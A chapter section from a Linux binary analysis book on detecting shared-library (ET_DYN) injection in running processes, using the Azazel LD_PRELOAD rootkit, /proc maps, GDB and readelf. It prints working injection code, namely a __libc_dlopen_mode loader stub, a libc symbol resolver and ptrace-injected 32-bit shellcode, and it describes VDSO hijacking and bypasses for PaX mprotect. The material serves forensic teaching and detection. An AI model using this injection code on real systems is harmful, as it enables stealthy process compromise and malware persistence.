Table of Contents for
Learning Linux Binary Analysis

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Learning Linux Binary Analysis by Ryan elfmaster O'Neill Published by Packt Publishing, 2016
  1. Cover
  2. Table of Contents
  3. Learning Linux Binary Analysis
  4. Learning Linux Binary Analysis
  5. Credits
  6. About the Author
  7. Acknowledgments
  8. About the Reviewers
  9. www.PacktPub.com
  10. Preface
  11. What you need for this book
  12. Who this book is for
  13. Conventions
  14. Reader feedback
  15. Customer support
  16. 1. The Linux Environment and Its Tools
  17. Useful devices and files
  18. Linker-related environment points
  19. Summary
  20. 2. The ELF Binary Format
  21. ELF program headers
  22. ELF section headers
  23. ELF symbols
  24. ELF relocations
  25. ELF dynamic linking
  26. Coding an ELF Parser
  27. Summary
  28. 3. Linux Process Tracing
  29. ptrace requests
  30. The process register state and flags
  31. A simple ptrace-based debugger
  32. A simple ptrace debugger with process attach capabilities
  33. Advanced function-tracing software
  34. ptrace and forensic analysis
  35. Process image reconstruction – from the memory to the executable
  36. Code injection with ptrace
  37. Simple examples aren't always so trivial
  38. Demonstrating the code_inject tool
  39. A ptrace anti-debugging trick
  40. Summary
  41. 4. ELF Virus Technology �� Linux/Unix Viruses
  42. ELF virus engineering challenges
  43. ELF virus parasite infection methods
  44. The PT_NOTE to PT_LOAD conversion infection method
  45. Infecting control flow
  46. Process memory viruses and rootkits – remote code injection techniques
  47. ELF anti-debugging and packing techniques
  48. ELF virus detection and disinfection
  49. Summary
  50. 5. Linux Binary Protection
  51. Stub mechanics and the userland exec
  52. Other jobs performed by protector stubs
  53. Existing ELF binary protectors
  54. Downloading Maya-protected binaries
  55. Anti-debugging for binary protection
  56. Resistance to emulation
  57. Obfuscation methods
  58. Protecting control flow integrity
  59. Other resources
  60. Summary
  61. 6. ELF Binary Forensics in Linux
  62. Detecting other forms of control flow hijacking
  63. Identifying parasite code characteristics
  64. Checking the dynamic segment for DLL injection traces
  65. Identifying reverse text padding infections
  66. Identifying text segment padding infections
  67. Identifying protected binaries
  68. IDA Pro
  69. Summary
  70. 7. Process Memory Forensics
  71. Process memory infection
  72. Detecting the ET_DYN injection
  73. Linux ELF core files
  74. Summary
  75. 8. ECFS – Extended Core File Snapshot Technology
  76. The ECFS philosophy
  77. Getting started with ECFS
  78. libecfs – a library for parsing ECFS files
  79. readecfs
  80. Examining an infected process using ECFS
  81. The ECFS reference guide
  82. Process necromancy with ECFS
  83. Learning more about ECFS
  84. Summary
  85. 9. Linux /proc/kcore Analysis
  86. stock vmlinux has no symbols
  87. /proc/kcore and GDB exploration
  88. Direct sys_call_table modifications
  89. Kprobe rootkits
  90. Debug register rootkits – DRR
  91. VFS layer rootkits
  92. Other kernel infection techniques
  93. vmlinux and .altinstructions patching
  94. Using taskverse to see hidden processes
  95. Infected LKMs – kernel drivers
  96. Notes on /dev/kmem and /dev/mem
  97. /dev/mem
  98. K-ecfs – kernel ECFS
  99. Kernel hacking goodies
  100. Summary
  101. Index

Detecting the ET_DYN injection

I think that the most prevalent type of process infection is DLL injection, also known as .so injection. It is a clean and effective solution that suits the needs of most attackers and runtime malware. Let's take a look at an infected process, and I will highlight the ways in which we can identify parasite code.

Note

The terms shared object, shared library, DLL, and ET_DYN are all used synonymously throughout this book, especially in this particular section.

Azazel userland rootkit detection

Our infected process is a simple test program named ./host that is infected with the Azazel userland rootkit. Azazel is the newer version of the popular Jynx rootkit. Both of these rootkits rely on LD_PRELOAD to load a malicious shared library that hijacks various glibc shared library functions. We will inspect the infected process using various GNU tools and the Linux environment, such as the /proc filesystem.

Mapping out the process address space

The first step while analyzing a process is to map out the address space. The most straightforward way to do this is by looking at the /proc/<pid>/maps file. We want to take note of any strange file mappings and segments with odd permissions. Also in our case, we may need to check the stack for environment variables, so we will want to take note of its location in memory.

Note

The pmap <pid> command can also be used instead of cat /proc/<pid>/maps. I prefer looking directly at the maps file because it shows the entire address range of each memory segment and the complete file path of any file mappings, such as shared libraries.

Here's an example of memory mappings of an infected process ./host:

$ cat /proc/`pidof host`/maps
00400000-00401000 r-xp 00000000 00:24 5553671       /home/user/git/azazel/host
00600000-00601000 r--p 00000000 00:24 5553671       /home/user/git/azazel/host
00601000-00602000 rw-p 00001000 00:24 5553671       /home/user/git/azazel/host
0066c000-0068d000 rw-p 00000000 00:00 0              [heap]
3001000000-3001019000 r-xp 00000000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001019000-3001218000 ---p 00019000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001218000-3001219000 r--p 00018000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
3001219000-300121a000 rw-p 00019000 08:01 11406078  /lib/x86_64-linux-gnu/libaudit.so.1.0.0
300121a000-3001224000 rw-p 00000000 00:00 0
3003400000-300340d000 r-xp 00000000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300340d000-300360c000 ---p 0000d000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300360c000-300360d000 r--p 0000c000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
300360d000-300360e000 rw-p 0000d000 08:01 11406085    /lib/x86_64-linux-gnu/libpam.so.0.83.1
7fc30ac7f000-7fc30ac81000 r-xp 00000000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ac81000-7fc30ae80000 ---p 00002000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae80000-7fc30ae81000 r--p 00001000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae81000-7fc30ae82000 rw-p 00002000 08:01 11406070 /lib/x86_64-linux-gnu/libutil-2.19.so
7fc30ae82000-7fc30ae85000 r-xp 00000000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30ae85000-7fc30b084000 ---p 00003000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b084000-7fc30b085000 r--p 00002000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b085000-7fc30b086000 rw-p 00003000 08:01 11406068 /lib/x86_64-linux-gnu/libdl-2.19.so
7fc30b086000-7fc30b241000 r-xp 00000000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b241000-7fc30b440000 ---p 001bb000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b440000-7fc30b444000 r--p 001ba000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b444000-7fc30b446000 rw-p 001be000 08:01 11406096 /lib/x86_64-linux-gnu/libc-2.19.so
7fc30b446000-7fc30b44b000 rw-p 00000000 00:00 0
7fc30b44b000-7fc30b453000 r-xp 00000000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b453000-7fc30b652000 ---p 00008000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b652000-7fc30b653000 r--p 00007000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b653000-7fc30b654000 rw-p 00008000 00:24 5553672   /home/user/git/azazel/libselinux.so
7fc30b654000-7fc30b677000 r-xp 00000000 08:01 11406093    /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b847000-7fc30b84c000 rw-p 00000000 00:00 0
7fc30b873000-7fc30b876000 rw-p 00000000 00:00 0
7fc30b876000-7fc30b877000 r--p 00022000 08:01 11406093   /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b877000-7fc30b878000 rw-p 00023000 08:01 11406093   /lib/x86_64-linux-gnu/ld-2.19.so
7fc30b878000-7fc30b879000 rw-p 00000000 00:00 0
7fff82fae000-7fff82fcf000 rw-p 00000000 00:00 0          [stack]
7fff82ffb000-7fff82ffd000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

The areas of interest and concern are highlighted in the preceding output of the maps file for the process of ./host. In particular, notice the shared library with the /home/user/git/azazel/libselinux.so path. This should immediately grab your attention because the path is not the standard shared library path and it has the name libselinux.so, which is traditionally stored with all other shared libraries (that is, /usr/lib).

This could indicate possible shared library injection (also known as the ET_DYN injection), which would mean that this is not the authentic libselinux.so library. The first thing that we might check for in this case is the LD_PRELOAD environment variable to see whether it was used to preload the libselinux.so library.

Finding LD_PRELOAD on the stack

The environment variables for a program are stored near the bottom of the stack at the beginning of a program's runtime. The bottom of the stack is actually the highest address (the beginning of the stack), since the stack grows into smaller addresses on the x86 architecture. Based on the output from /proc/<pid>/maps, we can get the location of the stack:

STACK_TOP           STACK_BOTTOM
7fff82fae000   -    7fff82fcf000

So, we want to check the stack from 0x7fff82fcf000 onward. Using GDB, we can attach to the process and quickly locate the environment variables on the stack by using the x/s <address> command, which tells GDB to view the memory in ASCII format. The x/4096s <address> command does the same thing but reads from 4,096 bytes of data.

We can safely presume that the environment variables will be in the first 4,096 bytes of the stack, but since the stack grows into lower addresses, we must start reading at <stack_bottom> - 4096.

Note

The argv and envp pointers point to command-line arguments and environment variables respectively. We are not looking for the actual pointers but rather the strings that these pointers reference.

Here's an example of using GDB to read environment variables on a stack:

$ gdb -q attach `pidof host`
$ x/4096s (0x7fff82fcf000 – 4096)

… scroll down a few pages …

0x7fff82fce359:  "./host"
0x7fff82fce360:  "LD_PRELOAD=./libselinux.so"
0x7fff82fce37b:  "XDG_VTNR=7"
---Type <return> to continue, or q <return> to quit---
0x7fff82fce386:  "XDG_SESSION_ID=c2"
0x7fff82fce398:  "CLUTTER_IM_MODULE=xim"
0x7fff82fce3ae:  "SELINUX_INIT=YES"
0x7fff82fce3bf:  "SESSION=ubuntu"
0x7fff82fce3ce:  "GPG_AGENT_INFO=/run/user/1000/keyring-jIVrX2/gpg:0:1"
0x7fff82fce403:  "TERM=xterm"
0x7fff82fce40e:  "SHELL=/bin/bash"

… truncated …

As we can see from the preceding output, we have verified that LD_PRELOAD was used to preload libselinux.so into the process. This means that any glibc functions within the program that have the same name as any functions in the preloaded shared library will be overridden and effectively hijacked by the ones in libselinux.so.

In other words, if the ./host program calls the fopen function from glibc and libselinux.so contains its own version of fopen, then that is the fopen function that will be stored in the PLT/GOT (the .got.plt section) and used instead of the glibc version. This leads us to the next indicated item—detecting function hijacking in the PLT/GOT (the PLT's global offset table).

Detecting PLT/GOT hooks

Before checking the PLT/GOT that is in the ELF section called .got.plt (which is in the data segment of the executable), let's see which functions in the ./host program have relocations for the PLT/GOT. Remember from the chapter on ELF internals that the relocation entries for the global offset table are of the <ARCH>_JUMP_SLOT type. Refer to the ELF(5) manual for details.

Note

The relocation type for the PLT/GOT is called <ARCH>_JUMP_SLOT because they are just that—jump slots. They contain function pointers that the PLT uses with jmp instructions to transfer control to the destination function. The actual relocation types are named X86_64_JUMP_SLOT, i386_JUMP_SLOT, and so on depending on the architecture.

Here's an example of identifying shared library functions:

$ readelf -r host
Relocation section '.rela.plt' at offset 0x418 contains 7 entries:
000000601018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 unlink + 0
000000601020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 puts + 0
000000601028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 opendir + 0
000000601030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 __libc_start_main+0
000000601038  000500000007 R_X86_64_JUMP_SLO 0000000000000000 __gmon_start__+0
000000601040  000600000007 R_X86_64_JUMP_SLO 0000000000000000 pause + 0
000000601048  000700000007 R_X86_64_JUMP_SLO 0000000000000000 fopen + 0

We can see that there are several well-known glibc functions being called. It is possible that some or all of these are being hijacked by the imposture shared library libselinux.so.

Identifying incorrect GOT addresses

From the readelf output that displays the PLT/GOT entries in the ./host executable, we can see the address of each symbol. Let's take a look at the global offset table in the memory for the following symbols: fopen, opendir, and unlink. It is possible that these have been hijacked and no longer point to the libc.so library.

Here's an example of the GDB output displaying the GOT values:

(gdb) x/gx 0x601048
0x601048 <fopen@got.plt>:  0x00007fc30b44e609
(gdb) x/gx 0x601018
0x601018 <unlink@got.plt>:  0x00007fc30b44ec81
(gdb) x/gx 0x601028
0x601028 <opendir@got.plt>:  0x00007fc30b44ed77

A quick look at the executable memory region of the selinux.so shared library shows us that the addresses displayed in the GOT by GDB point to functions within selinux.so and not libc.so:

7fc30b44b000-7fc30b453000 r-xp  /home/user/git/azazel/libselinux.so

With this particular malware (Azazel), the malicious shared library was preloaded using LD_PRELOAD, which made verifying the library as suspicious an easy task. This is not always the case, as many forms of malware will inject the shared library via ptrace() or shellcode that uses either mmap() or __libc_dlopen_mode(). The heuristics for determining whether or not a shared library has been injected will be detailed in the next section.

Note

As we will see in the following chapter, the ECFS technology for process memory forensics has some features that make identifying injected DLLs and other types of ELF objects almost simple.

ET_DYN injection internals

As we just demonstrated, detecting shared libraries that have been preloaded with LD_PRELOAD is rather simple. What about shared libraries that were injected into a remote process? Or in other words, shared objects that were inserted into a pre-existing process? It is important to know whether or not a shared library was maliciously injected if we want to be able to take the next step and detect PLT/GOT hooks. First, we must identify all the ways in which a shared library can be injected into a remote process, as we briefly discussed in section 7.2.2.

Let's look at a concrete example of how this might be accomplished. Here is some example code from Saruman that injects PIE executables into a process.

Note

PIE executables are in the same format as shared libraries, so the same code will work for the injection of either type into a process.

Using the readelf utility, we can see that in the standard C library (libc.so.6), there exists a function named __libc_dlopen_mode. This function actually accomplishes the same thing as the dlopen function, which is not resident in libc. This means that with any process that uses libc, we can get the dynamic linker to load whatever ET_DYN object we want to, while also automatically handling all the relocation patches.

Example – finding the symbol for __libc_dlopen_mode

It is rather common for attackers to use this function to load ET_DYN objects into a process:

$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep dlopen
  2128: 0000000000136160   146 FUNC    GLOBAL DEFAULT   12 __libc_dlopen_mode@@GLIBC_PRIVATE

Code example – the __libc_dlopen_mode shellcode

The following code is in C, but when compiled into machine code, it can be used as shellcode that we inject into the process using ptrace:

#define __RTLD_DLOPEN 0x80000000 //glibc internal dlopen flag emulates dlopen behaviour
__PAYLOAD_KEYWORDS__ void * dlopen_load_exec(const char *path, void *dlopen_addr)
{
        void * (*libc_dlopen_mode)(const char *, int) = dlopen_addr;
        void *handle = (void *)0xfff; //initialized for debugging
        handle = libc_dlopen_mode(path, __RTLD_DLOPEN|RTLD_NOW|RTLD_GLOBAL);
        __RETURN_VALUE__(handle);
        __BREAKPOINT__;
}

Notice that one of the arguments is void *dlopen_addr. Saruman locates the address to the __libc_dlopen_mode() function, which resides in libc.so. This is accomplished using a function for resolving symbols within the libc library.

Code example – libc symbol resolution

There are many more details to the following code, and I would highly encourage you to check out Saruman. It is specifically for injecting executable programs that are compiled as ET_DYN objects, but as mentioned previously, the injection method will also work for shared libraries since they are also compiled as ET_DYN objects:

Elf64_Addr get_sym_from_libc(handle_t *h, const char *name)
{
        int fd, i;
        struct stat st;
        Elf64_Addr libc_base_addr = get_libc_addr(h->tasks.pid);
        Elf64_Addr symaddr;
        
        if ((fd = open(globals.libc_path, O_RDONLY)) < 0) {
                perror("open libc");
                exit(-1);
        }
        
        if (fstat(fd, &st) < 0) {
                perror("fstat libc");
                exit(-1);
        }
        
        uint8_t *libcp = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
        if (libcp == MAP_FAILED) {
                perror("mmap libc");
                exit(-1);
        }
        
        symaddr = resolve_symbol((char *)name, libcp);
        if (symaddr == 0) {
                printf("[!] resolve_symbol failed for symbol '%s'\n", name);
                printf("Try using --manual-elf-loading option\n");
                exit(-1);
        }
        symaddr = symaddr + globals.libc_addr;

        DBG_MSG("[DEBUG]-> get_sym_from_libc() addr of __libc_dl_*: %lx\n", symaddr);
        return symaddr;

}

To further demystify shared library injection, let me show you a much simpler technique that uses ptrace injected shellcode to open()/mmap() the shared library into the process address space. This technique is fine to use, but it requires that the malware manually handle all of the hot patching of relocations. The __libc_dlopen_mode() function handles all of this transparently with the help of the dynamic linker itself, so it is actually easier in the long run.

Code example – the x86_32 shellcode to mmap() an ET_DYN object

The following shellcode can be injected into an executable segment within a given process and then be executed using ptrace.

Note that this is the second time I've used this hand-written shellcode as an example in the book. I wrote it in 2008 for a 32-bit Linux system, and it was convenient to use as an example. Otherwise, I'm sure I would have written something new to demonstrate a more modern approach in x86_64 Linux:

_start:
        jmp B
A:

        # fd = open("libtest.so.1.0", O_RDONLY);

        xorl %ecx, %ecx
        movb $5, %al
        popl %ebx
        xorl %ecx, %ecx
        int $0x80

        subl $24, %esp

        # mmap(0, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED, fd, 0);

        xorl %edx, %edx
        movl %edx, (%esp)
        movl $8192,4(%esp)
        movl $7, 8(%esp)
        movl $2, 12(%esp)
        movl %eax,16(%esp)
        movl %edx, 20(%esp)
        movl $90, %eax
        movl %esp, %ebx
        int $0x80

        # the int3 will pass control back the tracer
        int3
B:
        call A
        .string "/lib/libtest.so.1.0"

With PTRACE_POKETEXT to inject it and PTRACE_SETREGS to set %eip to the entry point of the shellcode, once the shellcode hits the int3 instruction, it will effectively pass the control back to your program that is performing the infection. This can then simply detach from the host process that is now infected with the shared library (/lib/libtest.so.1.0).

In some cases, such as on binaries that have PaX mprotect restrictions enabled (https://pax.grsecurity.net/docs/mprotect.txt), the ptrace system call cannot be used to inject shellcode into the text segment. This is because it is read-only, and the restrictions will also prevent marking the text segment writeable, so you cannot simply get around this. However, this can be circumvented in several ways, such as by setting the instruction pointer to __libc_dlopen_mode and storing the arguments to the function in registers (such as %rdi, %rsi, and so on). Alternatively, in the case of a 32-bit architecture, the arguments can be stored on the stack.

Another way is by manipulating the VDSO code that is present in most processes.

Manipulating VDSO to perform dirty work

This technique is one that is demonstrated at http://vxheaven.org/lib/vrn00.html, but the general idea is simple. The VDSO code that is mapped to the process address space, as seen in the /proc/<pid>/maps output earlier in this chapter, contains code that invokes system calls via the syscall (for 64-bit) and sysenter (for 32-bit) instructions. The calling convention for system calls in Linux always places the system call number in the %eax/%rax register.

If an attacker uses ptrace(PTRACE_SYSCALL, …), they can quickly locate the syscall instruction in the VDSO code and replace the register values to invoke whichever system call is desired. If this is done carefully and done while restoring the original system call that was executing, then it will not cause the application to crash. The open and mmap system calls can be used to load an executable object such as ET_DYN or ET_REL into the process address space. Alternatively, they can be used to simply create an anonymous memory mapping that can store shellcode.

This is a code example in which the attacker takes advantage of this code on a 32-bit system:

fffe420 <__kernel_vsyscall>:
ffffe420:       51                      push   %ecx
ffffe421:       52                      push   %edx
ffffe422:       55                      push   %ebp
ffffe423:       89 e5                   mov    %esp,%ebp
ffffe425:       0f 34                   sysenter

Note

On a 64-bit system, the VDSO contains at least two locations where the syscall instruction is used. The attacker can manipulate either of these.

The following is a code example in which the attacker takes advantage of this code on a 64-bit system:

ffffffffff700db8:       b0 60                   mov    $0x60,%al
ffffffffff700dba:       0f 05                   syscall

Shared object loading – legitimate or not?

The dynamic linker is the only legitimate way to bring a shared library into a process. Remember, however, that an attacker can use the __libc_dlopen_mode function, which invokes the dynamic linker to load an object. So how do we tell when the dynamic linker is doing legitimate work? There are three legitimate ways in which a shared object is mapped to a process by the dynamic linker.

Legitimate shared object loading

Let's look at what we consider legitimate shared object loading:

  • There is a valid DT_NEEDED entry in the executable program that corresponds to the shared library file.
  • The shared libraries that are validly loaded by the dynamic linker may in turn have their own DT_NEEDED entries in order to load other shared libraries. This can be called transitive shared library loading.
  • If a program is linked with libdl.so, then it may use the dynamic loading functions to load libraries on the fly. The function for loading shared objects is named dlopen, and the function for resolving symbols is named dlsym.

Note

As we have previously discussed, the LD_PRELOAD environment variable also invokes the dynamic linker, but this method is in a gray area as it is commonly used for both legitimate and illegitimate purposes. Therefore, it was not included in the list of legitimate shared object loading.

Illegitimate shared object loading

Now, let's take a look at the illegitimate ways in which a shared object can be loaded into a process, that is to say, by an attacker or a malware instance:

  • The __libc_dlopen_mode function exists within libc.so (not libdl.so) and is not intended to be called by a program. It is actually marked as a GLIBC PRIVATE function. Most processes have libc.so, and this is therefore a function commonly used by attackers or malware to load arbitrary shared objects.
  • VDSO manipulation. As we have already demonstrated, this technique can be used to execute arbitrary syscalls, and therefore it can be simple to memory-map a shared object with this method.
  • Shellcode that directly invokes the open and mmap system calls.
  • The DT_NEEDED entries can be added by an attacker by overwriting the DT_NULL tag in the dynamic segment of an executable or shared library, thus being able to tell the dynamic linker to load whatever shared object they wish. This particular method was discussed in Chapter 6, ELF Binary Forensics in Linux, and it falls more into the topic of that chapter, but it may also be necessary when inspecting a suspicious process.

Note

Be sure to inspect the binary of a suspicious process, and verify that the dynamic segment doesn't appear suspicious. Refer to the Checking the dynamic segment for DLL injection traces section of Chapter 6, ELF Binary Forensics in Linux.

Now that we have a clear definition of legitimate versus illegitimate loading of shared objects, we can get into the discussion of heuristics for detecting when a shared library is legitimate or not.

Beforehand, it is worth noting again that LD_PRELOAD is commonly used for good as well as bad purposes, and the only sure-fire way of knowing this is by inspecting what the actual code that resides in the preloaded shared object does. Therefore, we will leave LD_PRELOAD out of the discussion on heuristics here.

Heuristics for .so injection detection

In this section, I will describe the general principles behind detecting whether a shared library is legitimate or not. In Chapter 8, ECFS – Extended Core File Snapshot Technology, we will be discussing the ECFS technology, which actually incorporates these heuristics into its feature set.

For now, let's look at the principles only. We want to get a list of the shared libraries that are mapped to the process and then see which ones qualify for being legitimately loaded by the dynamic linker:

  1. Get a list of shared object paths from the /proc/<pid>/maps file.

    Note

    Some maliciously injected shared libraries won't appear as file mappings because the attacker created anonymous memory mappings and then memcpy'd the shared object code into those memory regions. In the next chapter, we will see that ECFS can weed these more stealthy entities out as well. A scan can be done of each executable memory region that is anonymously mapped to see whether ELF headers exist, particularly those with the ET_DYN file type.

  2. Determine whether or not a valid DT_NEEDED entry exists in the executable that corresponds to the shared library you are seeing. If one exists, then it is a legitimate shared library. After you have verified that a given shared library is legitimate, check that shared library's dynamic segment and enumerate the DT_NEEDED entries within it. Those corresponding shared libraries can also be marked as legitimate. This goes back to the concept of transitive shared object loading.
  3. Look at the PLT/GOT of the process's actual executable program. If there are any dlopen calls being used, then analyze the code to find any calls to dlopen. The dlopen calls may be passed arguments that can be inspected statically, like this for instance:
    void *handle = dlopen("somelib.so", RTLD_NOW);

    In such cases, the string will be stored as a static constant and will therefore be in the .rodata section of the binary. So, check whether the .rodata section (or wherever the string is stored) contains any strings that contain the shared library path you are trying to validate.

  4. If any of the shared object paths found in the maps file cannot be found or accounted for by a DT_NEEDED section and cannot be accounted for by any dlopen calls either, then that means it was either preloaded by LD_PRELOAD or injected by some other means. At this point, you should qualify the shared object as suspicious.

Tools for detecting PLT/GOT hooks

Currently, there are not many great tools that are specifically for process memory analysis in Linux. This is the reason that I designed ECFS (discussed in Chapter 8, ECFS – Extended Core File Snapshot Technology). There are only a few tools I know of that can detect PLT/GOT overwrites, and each one of them essentially uses the same heuristics that we just discussed:

  • Linux VMA Voodoo: This tool is a prototype that I designed through the DARPA CFT program in 2011. It is capable of detecting many types of process memory infections, but currently only works on 32-bit systems and is not available to the public. However, the new ECFS utility is open source, which was inspired by VMA Voodoo. You may read about VMA Voodoo at http://www.bitlackeys.org/#vmavudu.
  • ECFS (Extended core file snapshot) technology: This technology was originally designed to work as a native snapshot format for process memory forensics tools in Linux. It has evolved into something even more than that and has an entire chapter dedicated to it (Chapter 8, ECFS – Extended Core File Snapshot Technology). It can be found at https://github.com/elfmaster/ecfs.
  • Volatility plt_hook: The Volatility software is primarily geared towards full system memory analysis, but Georg Wicherski designed a plugin in 2013 that is specifically for detecting PLT/GOT infections within a process. This plugin uses heuristics similar to those that we previously discussed. This feature has now merged with the Volatility source code at https://github.com/volatilityfoundation/volatility.